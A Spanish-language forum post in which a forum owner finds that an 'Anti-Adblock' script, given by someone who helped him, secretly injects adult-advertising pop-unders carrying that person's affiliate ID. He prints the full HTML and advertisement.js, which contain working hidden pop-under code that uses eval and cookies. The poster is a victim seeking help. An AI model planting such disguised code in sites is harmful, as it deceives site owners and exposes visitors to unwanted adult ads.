Sale habiendo iniciado sesión en el foro y haciendo cualquier acción o viendo cualquier página. No siempre, pero sí en ocasiones.
Personas de este foro me han dado soporte, y supongo que una de ellas me ha metido su código de ero-advertising para ganar pasta a costa de mi foro.
La cuestión es dar con ese código y quitarlo, pero no se qué aspecto tiene y en qué lugar me lo han metido.
---------- Post agregado el 06-abr-2014 hora: 10:55 ----------
Ya he encontrado donde está. Alguien me hizo un script Anti Adblock. Me dijo que tenía que pegar ese código en Showthread y subir un archivo llamado advertisement.js al foro. Pues en este archivo es donde se encuentra lo de Ero advertising.
El contenido del script es este:
<!-- Anti-Adblock V2 -->
<style type="text/css">
#blockblockA {position:absolute;top:0px;left:0px;background-color:#000000;width:100%;height:100%;}
#blockblockA td {text-align:center;width:100%;height:100%;}
#blockblockA td p {font: bold 20px Verdana;color:#FFFFFF;}
#blockblockA td div {font: bold 13px Verdana;color:#FFFFFF;}
#blockblockB {visibility:invisible;display:none;}
#linkA {font: bold 13px Verdana;color:#FFFFFF;}
</style>
<noscript>
<style type="text/css">
#blockblockA {visibility:invisible!important;display:none!important;}
#blockblockA td {visibility:invisible!important;display:none!important;}
#blockblockA td p {visibility:invisible!important;display:none!important;}
#blockblockB {visibility:visible!important;display:block!important;}
</style>
</noscript>
<script type="text/javascript" src="/advertisement.js"></script>
<table id="blockblockA"><tr><td>
<!-- DISPLAY HTML CODE HERE -->
<img src="http://i62.tinypic.com/15x66f_th.jpg" height="121" width="123">
<br>
<p>Por favor desactive Ad-Block para ver esta página..</p>
<br>
<p>Busque en las opciones de AdBlock y dale a desactivar en ********.com</p>
<br>
<img src="http://********.com/images/Anti%20Adblock.JPG" height="213" width="323">
<br>
<br>
<!-- DISPLAY HTML CODE HERE -->
<!-- Do Not Remove Unless Purchased Please -->
<div id="linkA" align="center"><a href="http://********.com"><font color="FF9900">Volver a la pagina principal</font></a></div>
<!-- Do Not Remove Unless Purchased Or Testing Please -->
</td></tr></table>
<span id="blockblockB">
<!-- Anti-Adblock V2 -->
Y el contenido del advertisement.js es este:
document.write('<style type="text/css">#blockblockA {visibility:invisible!important;display:none!important;}#blockblockA td {visibility:invisible!important;display:none!important;}#blockblockA td p {visibility:invisible!important;display:none!important;}#blockblockB {visibility:visible!important;display:block!important;}</style>');
var stagedPopFrequency = "1 days";
var stagedCookieName = "__ads";
if (!document.currentStage)
document.currentStage = 0;
document.currentStage++;
if (document.currentStage == 1) {
function stagedGetCookie(Name) {
var search = Name + "=";
var returnvalue = "";
if (document.cookie.length > 0) {
offset = document.cookie.indexOf(search);
if (offset != -1) { // if cookie exists
offset += search.length;
// set index of beginning of value
end = document.cookie.indexOf(";", offset);
// set index of end of cookie value
if (end == -1)
end = document.cookie.length;
returnvalue = unescape(document.cookie.substring(offset, end));
}
}
return returnvalue;
}
function stagedSetCookie(Name, Value, Expire) {
if (Expire != null) {
var expireDate = new Date();
expireDate.setDate(expireDate.getDate() + parseInt(Expire));
document.cookie = Name+"="+Value+";path=/;expires=" + expireDate.toGMTString();
} else {
document.cookie = Name+"="+Value+";path=/";
}
}
function stagedResetCookie(Name) {
var expireDate = new Date();
expireDate.setDate(expireDate.getDate() - 10);
document.cookie = Name+"=;path=/;expires=" + expireDate.toGMTString();
}
function stagedPopUnder() {
if (stagedGetCookie(stagedCookieName) == '') {
var thisStage = 1;
var stageFunc = eval('window.popUnderStage'+thisStage);
if (stageFunc != undefined) {
stageFunc();
stagedSetCookie(stagedCookieName, thisStage + 1, stagedPopFrequency);
}
} else {
var thisStage = parseInt(stagedGetCookie(stagedCookieName));
var stageFunc = eval('window.popUnderStage'+thisStage);
if (stageFunc != undefined) {
stageFunc();
stagedSetCookie(stagedCookieName, thisStage + 1, stagedPopFrequency);
}
}
}
function stagedAttachBody() {
if (document.body) {
if (document.all) {
document.body.attachEvent('onclick', stagedPopUnder);
} else {
document.body.addEventListener('click', stagedPopUnder, false);
}
} else {
setTimeout('stagedAttachBody()', 200);
}
} stagedAttachBody();
}
var stagedTmpFunc = function() {
var pu = window.open("http://speedclicks.ero-advertising.com/speedclicks/in.php?pid=1885&spaceid=30582&returnurl=", "_blank", "width=800,height=600,scrollbars=1,resizable=1,menubar=1,location=1");
pu.blur();
window.focus();
}
eval('window.popUnderStage'+document.currentStage+' = stagedTmpFunc;');
stagedTmpFunc = null;
¿Qué debo hacer?